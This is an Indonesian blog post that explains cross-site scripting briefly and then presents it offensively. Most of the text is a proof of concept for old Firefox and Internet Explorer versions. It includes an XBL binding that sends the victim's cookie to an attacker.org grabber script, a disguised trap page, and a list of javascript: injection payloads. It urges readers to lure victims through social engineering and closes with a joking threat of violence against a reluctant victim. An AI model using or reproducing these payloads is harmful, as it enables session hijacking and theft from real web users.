Cross Scripting

Jumat, Desember 2nd, 2011

XSS


XSS merupakan kependekan yang digunakan untuk istilah cross site scripting.

XSS merupakan salah satu jenis serangan injeksi code (code injection attack). XSS dilakukan oleh penyerang dengan cara memasukkan kode HTML atau client script code lainnya ke suatu situs. Serangan ini akan seolah-olah datang dari situs tersebut. Akibat serangan ini antara lain penyerang dapat mem-bypass keamanan di sisi klien, mendapatkan informasi sensitif, atau menyimpan aplikasi berbahaya.

Alasan kependekan yang digunakan XSS bukan CSS karena CSS sudah digunakan untuk cascade style sheet.

Tipe XSS

  • Reflected atau nonpersistent
  • Stored atau persistent

Reflected XSS

Reflected XSS merupakan tipe XSS yang paling umum dan yang paling mudah dilakukan oleh penyerang. Penyerang menggunakan social engineering agar tautan dengan kode berbahaya ini diklik oleh pengguna. Dengan cara ini penyerang bisa mendapatkan cookie pengguna yang bisa digunakan selanjutnya untuk membajak session pengguna.

Mekanisme pertahanan menghadapi serangan ini adalah dengan melakukan validasi input sebelum menampilkan data apapun yang di-generate oleh pengguna. Jangan percayai apapun data yang dikirim oleh pengguna.

Stored XSS

Stored XSS lebih jarang ditemui dan dampak serangannya lebih besar. Sebuah serangan stored XSS dapat berakibat pada seluruh pengguna. Stored XSS terjadi saat pengguna diizinkan untuk memasukkan data yang akan ditampilkan kembali. Contohnya adalah pada message board, buku tamu, dll. Penyerang memasukkan kode HTML atau client script code lainnya pada posting mereka.

Serangan ini lebih menakutkan. Mekanisme pertahanannya sama dengan reflected XSS: jika pengguna diizinkan untuk memasukkan data, lakukan validasi sebelum disimpan pada aplikasi.

Cross Site Scripting (XSS) Vulnerability pada Firefox 3.x dan IE8/IE7

Proof of Concept on Firefox < 3.x :

Pertama kita buat sebuah script XML bernama test.xml

< ?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl">
 <binding id="xss">
 <implementation>
 <constructor>< ![CDATA[document.location='http://attacker.org/grabcookie.php?cookie='+document.cookie;]]>
 </constructor>
 </implementation>
 </binding>
</bindings>

dimana listing kode grabcookie.php bisa anda dapatkan pada tulisan Xplodecms Cross Site Scripting (XSS) Injection pastikan anda membuat file “enak.txt” dan kita set permission file tersebut menjadi dapat ditulis (chmod 777) lalu script test.xml kita sisipkan ke halaman web yang akan dijadikan perangkap dan ciptakan halaman web yang membuat si korban tidak tidak sadar kalau ia sedang menjadi korban.

<html>
 <title>Selamat Datang Di Web Pribadiku</title>
 <body>
 Selamat Datang Di Web Pribadiku, Semoga Web ini Bermanfaat bagi Anda :)
 <style>BODY{-moz-binding:url("http://attacker.org/test.xml#xss")}</style>
 </body>
 </html>
<pre>

Prof of Concept on IE8/IE7 :

Pada Ie7 atau IE 8 tidak memperbolehkan menjalankan kode “javascript:[jscodz]“, tapi kita bisa mengakalinya dengan menjalankan kode dengan membukanya dengan opsi “open it in new target”

Contohnya url di bawah ini:

http://attacker.com/tesie8.htm

</pre>
<style>@import 'javascript:alert("xss1")';</style>
 <img SRC=javascript:alert('XSS2')/>
 <body BACKGROUND="javascript:alert('XSS3')">
 <link REL="stylesheet" HREF="javascript:alert('XSS4');">
 <meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS5');">

 <div STYLE="background-image: url(javascript:alert('XSS7'))">
 <style>.XSS{background-image:url("javascript:alert('XSS8')");}</style><a></a>
 <style type="text/css">BODY{background:url("javascript:alert('XSS9')")}</style>
 <object classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>
<param name=url value=javascript:alert('XSS10')></param></object>
 <style>@import'http://ha.ckers.org/xss.css';</style>
 <script SRC="javascript:alert('xss11');"></script>
 <video SRC="javascript:alert('xss12');"</video>
 <layer SRC="javascript:alert('xss13')"></layer>

 <applet src="javascript:alert('xss15')" type=text/html>
<pre>

ketika kita buka halaman “http://attacker.com/tesie8.htm” maka javascript tidak jalan, tapi kalau kita buka url tersebut dengan target _blank maka script tersebut akan tereksekusi.

<a href=”http://attacker.com/tesie8.htm” target=”_blank”>Bukain deh :) </a>

dan,

atau,

<script>window.open(“http://attacker.com/tesie8.htm”);</script>

Dengan Teknik Social Enginering bagaimana kreatifitas anda membuat si korban datang ke website anda dengan halus agar tidak terkesan mencurigakan bagi korban, kalau si korban bersikeras tidak mau mengunjungi web anda, segera datang kerumahnya dan membawa golok dan todongkan ujung golok ke batang hidungnya dan katakan ” HOOIII BUKA WEB GUA SEKARANG GA !!!! KALO ENGGAK GUE SUNAT LOE,, AMPE ABIIIEzz,,,!!!!!

reference :

http://www.80vul.com/

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

%d blogger menyukai ini: